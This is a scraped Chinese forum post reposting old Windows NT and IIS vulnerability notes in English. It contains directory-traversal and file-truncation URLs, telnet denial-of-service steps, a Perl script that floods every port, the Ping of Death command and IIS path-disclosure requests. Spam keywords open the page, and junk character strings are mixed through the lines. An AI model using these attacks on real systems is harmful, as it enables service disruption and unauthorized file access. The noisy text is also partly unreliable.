久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      <small id="r7w9x"></small>
          <td id="r7w9x"></td><sub id="r7w9x"><menu id="r7w9x"><samp id="r7w9x"></samp></menu></sub>
        1. <th id="r7w9x"></th>
          1.  找回密碼
             注冊

            QQ登錄

            只需一步,快速開始

            NT的漏洞及描述(英文)

            [復(fù)制鏈接]
            1#
            發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
            受影響系統(tǒng):4.0,iis 1.06 J) K0 ?8 ~0 E; P. z6 j. q
            A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
            . j/ C8 D) U- j8 j3 Z% \, a
            / m: _" A) ?0 \/ V- JA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.  o3 w/ _  g0 J7 a2 d) b9 T

            " l' k6 h+ b. E0 Q; uBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.% O0 D. ]3 E$ X# j! x
            . ^2 @4 T$ V5 ~- N" J9 Z+ D2 M
            --------------------------------------------------------------------
            # p- G4 ^" ~* _
            & o( y: e* R1 {4 N2 a受影響系統(tǒng):4.0
            4 g/ V: u' D( I2 W7 M0 eA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
            & ~8 p# q. f, C
            / r( l  p1 B+ K( h+ F' ~' YIf the file 'target.bat' exists, the file will be truncated.
            # C* u* u# K5 h1 W3 }, s  C5 {, b$ P  l4 a! h8 \4 S6 p5 `  w

            . O% L  K; c4 w) O) L% N7 F' w2 f' s" n. ]A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.6 h5 [/ p  A5 q) w. J. \

            / _! x0 C3 z9 @6 G1 q6 W5 C----------------------------------------------------------------------3 P$ ?. ]+ p8 L

            : Z2 e" h- X' h: [受影響系統(tǒng):3.51,4.0
            4 |% E! C7 H3 U5 |$ dMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
            # _3 F0 A/ ~6 T5 Y, H) h" K/ {0 S9 I. m& D" c; i& e  m
            The following steps;% U  o/ u" x' T

            3 f; T) x& ]) [; Q6 l% j6 M4 sTelnet to an NT 4.0 system on port 135 9 |$ N5 t/ S4 B: v8 P" v
            Type about 10 characters followed by a <CR> & i9 N6 u8 i5 z# ]
            Exit Telnet
            9 n# T- S9 D, [% Kresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
            6 o) _1 A, D9 x  v& M- P  h
            8 H4 E9 G) p' B, o" s& s4 iWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.: z( }- z/ j1 @- o( }; P

            6 K8 L/ p, ~' C2 H" VThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.9 b' Y: }* c" Y3 j
            : l. @7 r+ B5 c7 V: h
            If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.9 o8 S) ^+ E+ l$ o5 O) x- i! ~5 L

            " ^; O' K4 R$ JThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):9 ?* n3 U$ J! v+ [

            & v) S7 H1 d7 M( ~, [/*begin poke code*/
            ' W9 b% d3 c. q4 q: a3 p  `' h" |2 f+ ]4 O+ v
            use Socket;+ F. k4 p3 \+ Z( D
            use FileHandle;( u" F8 R5 n% x( h
            require "chat2.pl";
            : a8 z5 m, t2 N' N* U: a2 v. \
            ; k0 K- J: U- a0 O% \& t# h$systemname = $ARGV[0] && shift;) P; P9 s, p7 b3 k! l5 U* k; u* n7 y

            ( x  I& A* b& M$verbose = 1; # tell me what you're hitting
            " T# h+ A$ v3 y9 z8 R3 A$ u; O$knownports = 1; # don't hit known problem ports
            ! I2 B8 e0 h5 y* I0 {0 z) Ffor ($port = $0; $port<65535; $port++)
            ; {1 Q" G- q$ z% d{
            ) R& t1 E; L3 P4 i0 b$ E, f: D; r  k+ G6 i5 V8 s" M' T! g

            ! q# t# c1 p+ ~2 D9 i1 _. cif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {, C! f* \9 T/ m6 D$ Z" D$ x
            next;6 N  X3 x4 }9 G6 S" {8 l" ^
            }5 O" N) H, E7 q2 J) a
            $fh = chat::open_port($systemname, $port);1 Z( Z+ |8 W& B0 O4 p8 g1 e
            chat::print ($fh,"This is about ten characters or more");
            + j: A; {) e& |; Jif ($verbose) {% @5 u; @0 w5 }0 t, ?1 T6 B
            print "Trying port: $port\n";  ?2 f& t: V: p' k
            } " T4 {; s% L6 b! x8 }7 {2 @" }5 p6 ?9 Z" B
            chat::close($fh);7 v$ R6 y# ]5 J# m1 E. I

            , }. M2 d+ X2 A0 ~' A; H( W}9 O1 j0 R, F5 H: ]: U

            / L. t, x% B: h/ Q9 F- ~
            * K6 i8 o4 p) q! w: P- E$ c4 H/*end poke code*/
              ^) L/ _% y( c; C/ u$ z9 q* B
            ( p4 w# E* v7 N2 K8 \Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername+ i1 J9 t5 ]% w, k0 G! @

              W8 g' D: ^* s" W  Q--------------------------------------------------------------------------------
            . m! X. W7 Z6 q1 U. d
            . Z( O, E+ a" l( s: y' |/ }受影響系統(tǒng):4.0
            1 L0 Y2 v6 l) H5 o& |6 ^" oUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.3 e: F# r! ~3 t) z0 G7 z8 n

            . I3 s( `* {, D$ B8 F5 Q. _This attack causes Dr. Watson to display an alert window and to log an error: 5 ]# s, L* L2 {+ n

            : F' m/ P" y: t7 U: q5 H- `"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
            - k3 t  f0 R: i2 H6 Y. F& p% w0 x% H/ c# ~/ S2 K0 f
            --------------------------------------------------------------------------------
            + ^2 [; Z$ z8 e9 G6 u5 P% a9 c- s/ U3 c' C2 ~0 n
            受影響系統(tǒng):3.51,4.0
            / q+ H. t. v, WLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:- f% v8 [- t" V
            4 f, F7 |: x' _! J6 e% r( S0 ~
            STOP: 0X0000001E  U/ E: H4 |1 _, R
            KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS$ h4 I: m+ g- h+ @; ]6 I2 r
            5 S7 I5 n1 O0 t
            -OR-
            - V8 W+ B4 v( E7 w. D8 R
            ( R5 s5 W1 q; ^STOP: 0x0000000A9 ~" h7 n) B. `% B( g
            IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
            9 b; j8 {, W3 b
            " k2 Z1 p, Z4 C) U4 s0 S% dNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
            5 e1 `: k9 t/ N1 U3 _1 `( R2 S' o% o. J) m
            --------------------------------------------------------------------------------
            & R2 y+ ^" K" {$ r& r8 G9 c# z, A' j1 c, Y$ Z# W$ s1 Q. t
            Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
            . M# [7 m5 C* P: W$ Z" m: l% p3 E9 `
            . o3 H+ B5 Q3 i9 e( ^* C--------------------------------------------------------2 W2 m9 ?7 T, C( H( a$ x0 z  {
            - f9 q: t# P8 v; V
            IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
            您需要登錄后才可以回帖 登錄 | 注冊

            本版積分規(guī)則

            QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

            GMT+8, 2025-9-16 13:20

            Powered by Discuz! X3.5

            © 2001-2025 Discuz! Team.

            快速回復(fù) 返回頂部 返回列表